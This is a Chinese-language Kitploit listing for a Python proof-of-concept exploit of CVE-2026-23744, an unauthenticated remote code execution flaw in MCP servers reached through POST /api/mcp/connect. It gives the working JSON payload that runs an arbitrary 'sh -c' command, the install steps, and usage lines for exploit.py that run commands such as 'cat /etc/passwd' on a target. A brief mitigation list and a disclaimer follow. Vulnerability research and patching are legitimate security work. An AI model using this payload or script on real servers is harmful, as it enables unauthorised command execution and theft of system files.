Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-POC — Python PoC,针对 CVE-2026-23744,通过 /api/mcp/connect 的 serverConfig 命令字段在 MCP 服务器中实现未认证 RCE(默认端口 6274) | Kitploit
工具/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

Python PoC,针对 CVE-2026-23744,通过 /api/mcp/connect 的 serverConfig 命令字段在 MCP 服务器中实现未认证 RCE(默认端口 6274)

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23744 — MCP 服务器未授权远程代码执行

由 d3vn0mi 提供的概念验证漏洞利用

概述

CVE-2026-23744 是暴露在 6274 端口上的 MCP 兼容服务器中存在的一个未授权远程代码执行(RCE)漏洞。/api/mcp/connect 端点接受一个 serverConfig 对象,该对象允许调用者指定任意操作系统命令及其参数——无需任何身份验证或授权检查。

能够通过网络访问该服务的攻击者可以以运行 MCP 服务器的用户身份执行任意命令。

详情值
CVE IDCVE-2026-23744
类型未授权远程代码执行
端点POST /api/mcp/connect
端口6274(默认)
严重性严重

易受攻击的载荷

root@kitploit:~
{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

服务器会直接启动所提供的 command 及给定的 args,不进行任何清理或访问控制。

安装

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

使用方法

root@kitploit:~
# 基本用法
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# 自定义端口
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# 跳过可达性检查
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# 自定义服务器 ID
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

选项

标志描述
-t, --target目标 IP 或主机名 (必填)
-c, --command要执行的系统命令 (必填)
-p, --port目标端口(默认:6274)
-s, --server-id载荷中的 serverId 值
--timeout探测超时时间(秒)(默认:30)
--no-check跳过初始可达性检查

修复建议

  • 不要将 MCP 服务器暴露给不受信任的网络。
  • 尽快应用供应商补丁。
  • 通过身份验证和网络层面的控制,限制对 /api/mcp/connect 端点的访问。
  • 监控 MCP 服务器进程是否出现意外的进程派生行为。

免责声明

本工具仅用于授权的安全测试和教育目的。未经授权访问计算机系统属于违法行为。作者对滥用行为不承担任何责任。在进行测试之前,请务必获得适当的授权。

许可证

本项目基于 MIT 许可证 授权。

作者

d3vn0mi — github.com/d3vn0mi

下载工具